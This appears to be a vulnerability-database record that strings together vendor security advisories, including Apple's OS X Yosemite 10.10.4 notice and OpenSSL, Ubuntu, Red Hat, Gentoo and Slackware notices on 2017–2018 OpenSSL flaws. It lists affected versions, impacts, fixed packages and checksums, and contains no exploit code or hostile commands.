the\ndisclosure of kernel memory layout. This issue was addressed through\nimproved memory management. \nCVE-ID\nCVE-2015-3720 : Stefan Esser\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nHFS parameters which could have led to the disclosure of kernel\nmemory layout. This issue was addressed through improved memory\nmanagement. \nCVE-ID\nCVE-2015-3721 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: kextd followed symbolic links while creating a new\nfile. This issue was addressed through improved handling of symbolic\nlinks. \nCVE-ID\nCVE-2015-3708 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A local user may be able to load unsigned kernel extensions\nDescription: A time-of-check time-of-use (TOCTOU) race condition\ncondition existed while validating the paths of kernel extensions. \nThis issue was addressed through improved checks to validate the path\nof the kernel extensions. \nCVE-ID\nCVE-2015-3709 : Ian Beer of Google Project Zero\n\nMail\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A maliciously crafted email can replace the message content\nwith an arbitrary webpage when the message is viewed\nDescription: An issue existed in the support for HTML email which\nallowed message content to be refreshed with an arbitrary webpage. \nThe issue was addressed through restricted support for HTML content. \nCVE-ID\nCVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek\n\nntfs\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in NTFS that could have led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2015-3711 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nntp\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker in a privileged position may be able to perform\na denial of service attack against two ntp clients\nDescription: Multiple issues existed in the authentication of ntp\npackets being received by configured end-points. These issues were\naddressed through improved connection state management. \nCVE-ID\nCVE-2015-1798\nCVE-2015-1799\n\nOpenSSL\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Multiple issues exist in OpenSSL, including one that may\nallow an attacker to intercept connections to a server that supports\nexport-grade ciphers\nDescription: Multiple issues existed in OpenSSL 0.9.8zd which were\naddressed by updating OpenSSL to version 0.9.8zf. \nCVE-ID\nCVE-2015-0209\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0293\n\nQuickTime\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in QuickTime. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-3661 : G. Geshev working with HP\u0027s Zero Day Initiative\nCVE-2015-3662 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3663 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3666 : Steven Seeley of Source Incite working with HP\u0027s Zero\nDay Initiative\nCVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai\nLu of Fortinet\u0027s FortiGuard Labs, Ryan Pentney, and Richard Johnson\nof Cisco Talos and Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3668 : Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3713 : Apple\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in the Security framework\ncode for parsing S/MIME e-mail and some other signed or encrypted\nobjects. This issue was addressed through improved validity checking. \nCVE-ID\nCVE-2013-1741\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Tampered applications may not be prevented from launching\nDescription: Apps using custom resource rules may have been\nsusceptible to tampering that would not have invalidated the\nsignature. This issue was addressed with improved resource\nvalidation. \nCVE-ID\nCVE-2015-3714 : Joshua Pitts of Leviathan Security Group\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to bypass code signing\nchecks\nDescription: An issue existed where code signing did not verify\nlibraries loaded outside the application bundle. This issue was\naddressed with improved bundle verification. \nCVE-ID\nCVE-2015-3715 : Patrick Wardle of Synack\n\nSpotlight\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Searching for a malicious file with Spotlight may lead to\ncommand injection\nDescription: A command injection vulnerability existed in the\nhandling of filenames of photos added to the local photo library. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2015-3716 : Apple\n\nSQLite\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: Multiple buffer overflows existed in SQLite\u0027s printf\nimplementation. These issues were addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3717 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nSystem Stats\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious app may be able to compromise systemstatsd\nDescription: A type confusion issue existed in systemstatsd\u0027s\nhandling of interprocess communication. By sending a maliciously\nformatted message to systemstatsd, it may have been possible to\nexecute arbitrary code as the systemstatsd process. The issue was\naddressed through additional type checking. \nCVE-ID\nCVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nTrueTypeScaler\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team\n\nzip\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Extracting a maliciously crafted zip file using the unzip\ntool may lead to an unexpected application termination or arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in the\nhandling of zip files. These issues were addressed through improved\nmemory handling. \nCVE-ID\n\nCVE-2014-8139\nCVE-2014-8140\nCVE-2014-8141\n\n\nOS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. \nhttps://support.apple.com/en-us/HT204950\n\nOS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJVksFmAAoJEBcWfLTuOo7tV1AQAIYpkOMpHp181b+70sgyZ/Ue\nmFM527FFGDfLLuIW6LTcBsEFe9cfZxumB8eOFPirTNRK7krsVMo1W+faHXyWOnx7\nkbWylHdhaoxnX+A6Gj0vP71V6TNNsTi9+2dmdmHUnwxZ7Ws5QCNKebumUG3MMXXo\nEKxE5SNSNKyMSSYmliS26cdl8fWrmg9qTxiZQnxjOCrg/CNAolgVIRRfdMUL7i4w\naGAyrlJXOxFOuNkqdHX2luccuHFV7aW/dIXQ4MyjiRNl/bWrBQmQlneLLpPdFZlH\ncMfGa2/baaNaCbU/GqhNKbO4fKYVaqQWzfUrtqX0+bRv2wmOq33ARy9KE23bYTvL\nU4E9x9z87LsLXGAdjUi6MDe5g87DcmwIEigfF6/EHbDYa/2VvSdIa74XRv/JCN1+\naftHLotin76h4qV/dCAPf5J/Fr/1KFCM0IphhG7p+7fVTfyy7YDXNBiKCEZzLf8U\nTUWLUCgQhobtakqwzQJ5qyF8u63xzVXj8oeTOw6iiY/BLlj9def5LMm/z6ZKGTyC\n3c4+Sy5XvBHZoeiwdcndTVpnFbmmjZRdeqtdW/zX5mHnxXPa3lZiGoBDhHQgIg6J\n1tTVtnO1JSLXVYDR6Evx1EH10Vgkt2wAGTLjljSLwtckoEqc78qMAT1G5U4nFffI\n+gGm5FbAxjxElgA/gbaq\n=KLda\n-----END PGP SIGNATURE-----\n",
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"db": "CNNVD",
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VAR-201712-0248
Vulnerability from variot - Updated: 2026-04-10 21:55There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository. This vulnerability CVE-2017-3736 , CVE-2017-3732 and CVE-2015-3193 Similar problem.It may be affected unspecified. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer.
In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error.
OpenSSL 1.0.2 users should upgrade to 1.0.2n
This issue was reported to OpenSSL on 10th November 2017 by David Benjamin (Google). The fix was proposed by David Benjamin and implemented by Matt Caswell of the OpenSSL development team.
OpenSSL 1.0.2 users should upgrade to 1.0.2n
This issue was reported to OpenSSL on 22nd November 2017 by David Benjamin (Google). The issue was originally found via the OSS-Fuzz project.
Note
Support for version 1.0.1 ended on 31st December 2016. Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20171207.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html . OpenSSL Security Advisory [27 Mar 2018] ========================================
Constructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739)
Severity: Moderate
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe.
Incorrect CRYPTO_memcmp on HP-UX PA-RISC (CVE-2018-0733)
Severity: Moderate
Because of an implementation bug the PA-RISC CRYPTO_memcmp function is effectively reduced to only comparing the least significant bit of each byte. This allows an attacker to forge messages that would be considered as authenticated in an amount of tries lower than that guaranteed by the security claims of the scheme. The module can only be compiled by the HP-UX assembler, so that only HP-UX PA-RISC targets are affected. =========================================================================== Ubuntu Security Notice USN-3512-1 December 11, 2017
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 17.10
- Ubuntu 17.04
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in OpenSSL.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
David Benjamin discovered that OpenSSL did not correctly prevent buggy applications that ignore handshake errors from subsequently calling certain functions. While unlikely, a remote attacker could possibly use this issue to recover private keys. (CVE-2017-3738)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 17.10: libssl1.0.0 1.0.2g-1ubuntu13.3
Ubuntu 17.04: libssl1.0.0 1.0.2g-1ubuntu11.4
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.10
After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security and bug fix update Advisory ID: RHSA-2018:0998-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:0998 Issue date: 2018-04-10 CVE Names: CVE-2017-3736 CVE-2017-3737 CVE-2017-3738 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
openssl: bn_sqrx8x_internal carry bug on x86_64 (CVE-2017-3736)
-
openssl: Read/write after SSL object in error state (CVE-2017-3737)
-
openssl: rsaz_1024_mul_avx2 overflow bug on x86_64 (CVE-2017-3738)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.5 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.2k-12.el7.src.rpm
x86_64: openssl-1.0.2k-12.el7.x86_64.rpm openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-libs-1.0.2k-12.el7.i686.rpm openssl-libs-1.0.2k-12.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-devel-1.0.2k-12.el7.i686.rpm openssl-devel-1.0.2k-12.el7.x86_64.rpm openssl-perl-1.0.2k-12.el7.x86_64.rpm openssl-static-1.0.2k-12.el7.i686.rpm openssl-static-1.0.2k-12.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.2k-12.el7.src.rpm
x86_64: openssl-1.0.2k-12.el7.x86_64.rpm openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-libs-1.0.2k-12.el7.i686.rpm openssl-libs-1.0.2k-12.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-devel-1.0.2k-12.el7.i686.rpm openssl-devel-1.0.2k-12.el7.x86_64.rpm openssl-perl-1.0.2k-12.el7.x86_64.rpm openssl-static-1.0.2k-12.el7.i686.rpm openssl-static-1.0.2k-12.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.2k-12.el7.src.rpm
ppc64: openssl-1.0.2k-12.el7.ppc64.rpm openssl-debuginfo-1.0.2k-12.el7.ppc.rpm openssl-debuginfo-1.0.2k-12.el7.ppc64.rpm openssl-devel-1.0.2k-12.el7.ppc.rpm openssl-devel-1.0.2k-12.el7.ppc64.rpm openssl-libs-1.0.2k-12.el7.ppc.rpm openssl-libs-1.0.2k-12.el7.ppc64.rpm
ppc64le: openssl-1.0.2k-12.el7.ppc64le.rpm openssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm openssl-devel-1.0.2k-12.el7.ppc64le.rpm openssl-libs-1.0.2k-12.el7.ppc64le.rpm
s390x: openssl-1.0.2k-12.el7.s390x.rpm openssl-debuginfo-1.0.2k-12.el7.s390.rpm openssl-debuginfo-1.0.2k-12.el7.s390x.rpm openssl-devel-1.0.2k-12.el7.s390.rpm openssl-devel-1.0.2k-12.el7.s390x.rpm openssl-libs-1.0.2k-12.el7.s390.rpm openssl-libs-1.0.2k-12.el7.s390x.rpm
x86_64: openssl-1.0.2k-12.el7.x86_64.rpm openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-devel-1.0.2k-12.el7.i686.rpm openssl-devel-1.0.2k-12.el7.x86_64.rpm openssl-libs-1.0.2k-12.el7.i686.rpm openssl-libs-1.0.2k-12.el7.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):
Source: openssl-1.0.2k-12.el7.src.rpm
aarch64: openssl-1.0.2k-12.el7.aarch64.rpm openssl-debuginfo-1.0.2k-12.el7.aarch64.rpm openssl-devel-1.0.2k-12.el7.aarch64.rpm openssl-libs-1.0.2k-12.el7.aarch64.rpm
ppc64le: openssl-1.0.2k-12.el7.ppc64le.rpm openssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm openssl-devel-1.0.2k-12.el7.ppc64le.rpm openssl-libs-1.0.2k-12.el7.ppc64le.rpm
s390x: openssl-1.0.2k-12.el7.s390x.rpm openssl-debuginfo-1.0.2k-12.el7.s390.rpm openssl-debuginfo-1.0.2k-12.el7.s390x.rpm openssl-devel-1.0.2k-12.el7.s390.rpm openssl-devel-1.0.2k-12.el7.s390x.rpm openssl-libs-1.0.2k-12.el7.s390.rpm openssl-libs-1.0.2k-12.el7.s390x.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):
aarch64: openssl-debuginfo-1.0.2k-12.el7.aarch64.rpm openssl-perl-1.0.2k-12.el7.aarch64.rpm openssl-static-1.0.2k-12.el7.aarch64.rpm
ppc64le: openssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm openssl-perl-1.0.2k-12.el7.ppc64le.rpm openssl-static-1.0.2k-12.el7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.2k-12.el7.s390.rpm openssl-debuginfo-1.0.2k-12.el7.s390x.rpm openssl-perl-1.0.2k-12.el7.s390x.rpm openssl-static-1.0.2k-12.el7.s390.rpm openssl-static-1.0.2k-12.el7.s390x.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.2k-12.el7.ppc.rpm openssl-debuginfo-1.0.2k-12.el7.ppc64.rpm openssl-perl-1.0.2k-12.el7.ppc64.rpm openssl-static-1.0.2k-12.el7.ppc.rpm openssl-static-1.0.2k-12.el7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm openssl-perl-1.0.2k-12.el7.ppc64le.rpm openssl-static-1.0.2k-12.el7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.2k-12.el7.s390.rpm openssl-debuginfo-1.0.2k-12.el7.s390x.rpm openssl-perl-1.0.2k-12.el7.s390x.rpm openssl-static-1.0.2k-12.el7.s390.rpm openssl-static-1.0.2k-12.el7.s390x.rpm
x86_64: openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-perl-1.0.2k-12.el7.x86_64.rpm openssl-static-1.0.2k-12.el7.i686.rpm openssl-static-1.0.2k-12.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.2k-12.el7.src.rpm
x86_64: openssl-1.0.2k-12.el7.x86_64.rpm openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-devel-1.0.2k-12.el7.i686.rpm openssl-devel-1.0.2k-12.el7.x86_64.rpm openssl-libs-1.0.2k-12.el7.i686.rpm openssl-libs-1.0.2k-12.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-12.el7.i686.rpm openssl-debuginfo-1.0.2k-12.el7.x86_64.rpm openssl-perl-1.0.2k-12.el7.x86_64.rpm openssl-static-1.0.2k-12.el7.i686.rpm openssl-static-1.0.2k-12.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2017-3736 https://access.redhat.com/security/cve/CVE-2017-3737 https://access.redhat.com/security/cve/CVE-2017-3738 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-US/red_hat_enterprise_linux/7/html/7.5_release_notes/index.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
This release adds the new Apache HTTP Server 2.4.29 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes and enhancements. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6306. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBCS-373 - Errata for httpd 2.4.29 GA RHEL 7
Gentoo Linux Security Advisory GLSA 201712-03
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 14, 2017 Bugs: #629290, #636264, #640172 ID: 201712-03
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which may lead to a Denial of Service condition.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2n >= 1.0.2n
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the referenced CVE identifiers for details.
Impact
A remote attacker could cause a Denial of Service condition, recover a private key in unlikely circumstances, circumvent security restrictions to perform unauthorized actions, or gain access to sensitive information.
Workaround
There are no known workarounds at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2n"
References
[ 1 ] CVE-2017-3735 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3735 [ 2 ] CVE-2017-3736 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3736 [ 3 ] CVE-2017-3737 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3737 [ 4 ] CVE-2017-3738 https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3738
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201712-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--IrEhWFjxIJsFtqH1v1HHQsLm3nLmhNeP4--
.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.2n-i586-1_slack14.2.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-2_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-2_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-2_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-2_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-2_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-2_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-2_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-2_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-2_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-2_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-2_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-2_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1u-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1u-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1u-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1u-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2n-i586-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2n-i586-1_slack14.2.txz
Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2n-x86_64-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2n-x86_64-1_slack14.2.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2n-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2n-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2n-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2n-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 644fbae107aa826aeb955cec011af852 openssl-0.9.8zh-i486-2_slack13.0.txz 6fa3075d061664f5bbe3d8de9e2bf368 openssl-solibs-0.9.8zh-i486-2_slack13.0.txz
Slackware x86_64 13.0 packages: b53745715746f9dbef4a38dd8da03c94 openssl-0.9.8zh-x86_64-2_slack13.0.txz 5976e4f969f6adc2b43ba1592a52d5ba openssl-solibs-0.9.8zh-x86_64-2_slack13.0.txz
Slackware 13.1 packages: e0608c002b708abaf2f5ceee4e4b155d openssl-0.9.8zh-i486-2_slack13.1.txz cac0d5ccba2dccd979284f2051dab525 openssl-solibs-0.9.8zh-i486-2_slack13.1.txz
Slackware x86_64 13.1 packages: 01510ab2aab397be93e4bfdd04315bd0 openssl-0.9.8zh-x86_64-2_slack13.1.txz 0be1f99d5391cbc3b15dcd4371cb621a openssl-solibs-0.9.8zh-x86_64-2_slack13.1.txz
